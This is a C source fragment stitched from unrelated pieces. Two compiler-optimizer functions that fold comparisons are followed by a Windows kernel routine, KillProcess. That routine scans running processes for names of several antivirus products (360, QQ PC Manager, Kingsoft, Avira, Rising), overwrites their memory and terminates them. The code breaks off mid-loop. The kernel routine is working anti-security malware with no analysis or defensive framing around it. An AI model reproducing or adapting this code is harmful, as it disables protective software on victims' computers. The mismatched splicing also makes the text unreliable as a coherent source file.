static instruction *CmpRelocZero( instruction *ins, opcnt c, opcnt r ) /*********************************************************************/ { name *cons; name *rel; bool truth; if( OpcodeNumOperands( ins ) != 2 ) return( NULL ); cons = ins->operands[c]; if( cons->n.class != N_CONSTANT ) return( NULL ); if( cons->c.const_type != CONS_ABSOLUTE ) return( NULL ); if( CFTest( cons->c.value ) != 0 ) return( NULL ); rel = ins->operands[r]; if( rel->c.const_type == CONS_OFFSET && !AskSegIsNear( (segment_id)rel->c.lo.int_value ) ) return( NULL ); switch( ins->head.opcode ) { case OP_BIT_TEST_FALSE: case OP_CMP_EQUAL: case OP_CMP_LESS: case OP_CMP_LESS_EQUAL: truth = false; break; case OP_BIT_TEST_TRUE: case OP_CMP_GREATER: case OP_CMP_GREATER_EQUAL: case OP_CMP_NOT_EQUAL: truth = true; break; default: return( false ); } if( !ActiveCompare( ins ) ) return( NULL ); if( c != 1 ) truth = !truth; if( truth ) { _SetBlockIndex( ins, _TrueIndex(ins), _TrueIndex(ins) ); } else { _SetBlockIndex( ins, _FalseIndex(ins), _FalseIndex(ins) ); } return( KillCompare( ins, AllocIntConst( truth ? FETrue() : 0 ) ) ); }
static instruction *StraightLine( instruction *ins, tn fold, bool is_true ) /*************************************************************************** See if we can turn a comparison into a straight line piece of code. */ { name *result; result = TGetName( fold ); if( result == NULL ) return( NULL ); if( result->n.class != N_CONSTANT ) return( NULL ); if( result->c.const_type != CONS_ABSOLUTE ) return( NULL ); if( result->c.lo.int_value == 0 ) is_true = !is_true; if( is_true ) { _SetBlockIndex( ins, _TrueIndex(ins), _TrueIndex(ins) ); } else { _SetBlockIndex( ins, _FalseIndex(ins), _FalseIndex(ins) ); } return( KillCompare( ins, result ) ); }
void KillProcess(PVOID Context) { NTSTATUS status; HANDLE prohd; BOOLEAN bexe; ULONG puserAddress; KAPC_STATE ApcState; ANSI_STRING imagename; PEPROCESS pepro,ptempepro; LARGE_INTEGER timeout; PSE_AUDIT_PROCESS_CREATION_INFO papc; ANSI_STRING pastr; PVOID pstrb=NULL; while(TRUE) { pepro=PsGetCurrentProcess(); ptempepro=pepro; do { bexe=FALSE; RtlInitAnsiString(&imagename,(PVOID)((ULONG)ptempepro+eprooffset.ImageFileName)); //+0x174 ImageFileName papc=(PSE_AUDIT_PROCESS_CREATION_INFO)((ULONG)ptempepro+eprooffset.SE_AUDIT_PROCESS_CREATION_INFO);//EPROCESS偏移0x1f4处存放着_SE_AUDIT_PROCESS_CREATION_INFO结构的指针 __try { if (papc->ImageFileName->Name.Length!=0) { RtlUnicodeStringToAnsiString(&pastr,&papc->ImageFileName->Name,TRUE); pstrb=strstr(pastr.Buffer,"360"); if (pstrb!=NULL) { bexe=TRUE; } RtlFreeAnsiString(&pastr); } }__except(1){} KillCompare(&imagename,"360tray.exe",&bexe); KillCompare(&imagename,"360safe.exe",&bexe); KillCompare(&imagename,"ZhuDongFangYu.e",&bexe); KillCompare(&imagename,"360rp.exe",&bexe); KillCompare(&imagename,"360sd.exe",&bexe); KillCompare(&imagename,"qqpcrtp.exe",&bexe); KillCompare(&imagename,"qqpcleakscan.ex",&bexe); KillCompare(&imagename,"qqpctray.exe",&bexe); KillCompare(&imagename,"qqpcmgr.exe",&bexe); KillCompare(&imagename,"ksafe.exe",&bexe); KillCompare(&imagename,"kscan.exe",&bexe); KillCompare(&imagename,"kxescore.exe",&bexe); KillCompare(&imagename,"kxetray.exe",&bexe); KillCompare(&imagename,"ksafesvc.exe",&bexe); KillCompare(&imagename,"ksafetray.exe",&bexe); KillCompare(&imagename,"ksmgui.exe",&bexe); KillCompare(&imagename,"ksmsvc.exe",&bexe); KillCompare(&imagename,"avcenter.exe",&bexe); KillCompare(&imagename,"avgnt.exe",&bexe); KillCompare(&imagename,"avguard.exe",&bexe); KillCompare(&imagename,"avshadow.exe",&bexe); KillCompare(&imagename,"sched.exe",&bexe); KillCompare(&imagename,"ravmond.exe",&bexe); KillCompare(&imagename,"rsagent.exe",&bexe); KillCompare(&imagename,"rstray.exe",&bexe); KillCompare(&imagename,"rsmgrsvc.exe",&bexe); if (bexe) { KeStackAttachProcess(ptempepro,&ApcState); for(puserAddress=0;puserAddress<=0x7fffffff;puserAddress+=0x1000) { if(MmIsAddressValid((PVOID)puserAddress)) { __try { ProbeForWrite((PVOID)puserAddress,0x1000,sizeof(ULONG)); RtlZeroMemory((PVOID)puserAddress, 0x1000); }__except(1) { continue; } } else { if(puserAddress>0x1000000)//填这么多足够破坏进程数据了 { break; } } } KeUnstackDetachProcess(&ApcState); status=ObOpenObjectByPointer(ptempepro,0,NULL,PROCESS_ALL_ACCESS,*PsProcessType,KernelMode,&prohd); if (NT_SUCCESS(status)) { ZwTerminateProcess(prohd,0); ZwClose(prohd); } } ptempepro=(PEPROCESS)((ULONG)(*(PULONG)((ULONG)ptempepro+eprooffset.ActiveProcessLinks))-eprooffset.ActiveProcessLinks); //+0x088 ActiveProcessLinks : _LIST_ENTRY } while (ptempepro!=pepro);